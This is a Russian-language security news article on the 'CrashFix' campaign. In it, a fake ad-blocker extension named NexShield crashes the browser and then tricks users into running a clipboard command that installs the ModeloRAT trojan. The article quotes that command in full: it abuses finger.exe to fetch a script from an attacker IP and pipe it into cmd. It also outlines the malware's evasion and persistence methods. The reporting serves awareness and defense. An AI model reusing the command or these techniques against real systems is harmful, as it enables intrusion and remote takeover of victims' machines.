Поддельная защита и мнимая угроза
Эксперты по безопасности компании Huntress выявили кампанию по распространению ранее неизвестного RAT-троянца. Злоумышленники используют сравнительно простые, но хорошо продуманные методы, где главную роль играет поддельный блокировщик рекламы для браузеров.
Потенциальным жертвам, которые ищут блокировщик рекламы или средства защиты приватности, подсовывается реклама некоего расширения под названием NexShield - Advanced Web Guardian (ID: cpcdkmjddocikjdkbbeiaafnpdbdafmi), размещённого в Chrome Web Store.
Оно преподносится как инструмент для защиты от рекламны, трекеров, вредоносов и интрузивного контента. В действительности это почти стопроцентный клон легитимного расширения к множеству браузеров uBlock Origin Lite version 2025.1116.1841. Но с нюансами.
Злонамеренная модификация выводит мнимое уведомление безопасности, которое сообщает пользователю об «аномальной» приостановке работы браузера и предлагает провести «сканирование» для устранения предполагаемой угрозы безопасности, замеченной браузеров Microsoft Edge (учитывая, что расширение устанавливалось из Chrome Web Store, это уже выглядит подозрительно, хотя расширения из магазина Google действительно можно устанавливать и на Edge).
В поддельном уведомлении также предлагалось произвести следующие манипуляции: нажать Win + R, затем CTRL + V и Enter.
Иными словами, предлагалось открыть консоль Windows, сгрузить в неё специально подготовленный код (которая уже находится в буфере обмена) и запустить его.
При этом в диалоговом окне выводится совсем другой код: «edge.exe -fix-browser -hash=...». Если вручную скопировать и вставить именно его, браузер подвисает намертво. Производится DoS-атака, которая моментально вычерпывает все системные ресурсы, - вредонос пытается создать миллиард подключений к сетевым портам, причём делает это циклично. В результате браузер подвисает и, в конечном счёте, падает.
Атака начинается через 60 минут после установки расширения и повторяется каждые десять минут, если пользователь закрывает всплывающее окно или копирует код вручную.
Если же он всё-таки просто вставляет код, заложенный вредоносом в буфер обмена, и запускает его, то начинается уже процесс заражения RAT-троянцем. В Huntress назвали этот сценарий CrashFix.
«Фактически это продвинутая разновидность атаки ClickFix, то есть, в основе всего - социальная инженерия, - говорит Никита Павлов, эксперт по информационной безопасности компании SEQ. - Исходить следует из того, что любое предложение скопировать какой-либо код в терминал и запустить его, - это попытка атаковать вас вашими же собственными руками. От всамделишных защитных средств таких «предложений» никогда исходить не будет.
Корпоративные машины на особом счету
Код, который в действительности загружается в консоль Windows и выглядит так: cmd /c start "" /min cmd /c "copy %windir%\system32\finger.exe %temp%\ct.exe&%temp%\ct.exe confirm@199.217.98[.]108|cmd"
Он копирует легитимную утилиту finger.exe из системного каталога system32 во временный каталог, переименовывая его в ct.exe, и устанавливает соединение с сервером по адресу 199.217.98[.]108, откуда утилита скачивает зашифрованный и замаскированный скрипт. Тот скачивает с сервера злоумышленников полезную нагрузку второй стадии, сохраняет её под именем script.ps1 в каталог AppData и запускает, заодно удаляя себя, чтобы затруднить анализ процедуры заражения.
Вредоносный компонент второй стадии пытается определить, какие средства анализа и виртуализации установлены в системе (всего он распознаёт более 50 таких инструментов), и если находит их - моментально прекращает работу.
Кроме того, проверяется сетевое окружение и принадлежность компьютера к той или иной рабочей группе - злоумышленников интересуют в первую очередь машины, относящиеся к корпоративным сетям.
На такие компьютеры закачивается портативный дистрибутив Python WPy64-31401 и вредонос ModeloRAT, скрывающийся в файле modes.py.
ModeloRAT - полнофункциональный троянец для обеспечения удалённого доступа в заражённую машину.
Обфускация реализуется с помощью многословных и вводящих в заблуждение имён классов и переменных, шифрования RC4 для связи с командным сервером. Постоянство присутствия обеспечивается через реестр Windows. Поддерживается сразу несколько типов полезной нагрузки, включая исполняемые файлы, DLL и Python-скрипты.
Кроме того, ModeloRAT содержит функции с «мусорным» кодом в конце файла, предназначенные для запутывания средств статического анализа и аналитиков.
Индивидуальные машины также подвергаются многоэтапной последовательности заражения, однако в самом конце на них загружается некий тестовый компонент, по-видимому, безвредный.
Источником атак в Huntress называют APT-актора KongTuke, также известного как 404 TDS, Chaya_002, LandUpdate808 и TAG-124.
В распоряжении KongTuke - система перераспределения трафика, которая используется для сбора данных о потенциальной жертве (такие функции есть и у вышеописанных вредоносов), и перенаправления их на вредоносные ресурсы, откуда закачивается троянец удалённого доступа.
По данным экспертов компании Recorded Future, этой инфраструктурой пользовались операторы шифровальщиков Rhysida, Interlock и TA866/Asylum Ambuscade. KongTuke также может быть связан с операторами вредоносов SocGholish и D3F@ck Loader.
К настоящему моменту вредоносное расширение удалено из Chrome Web Store.
Поделиться
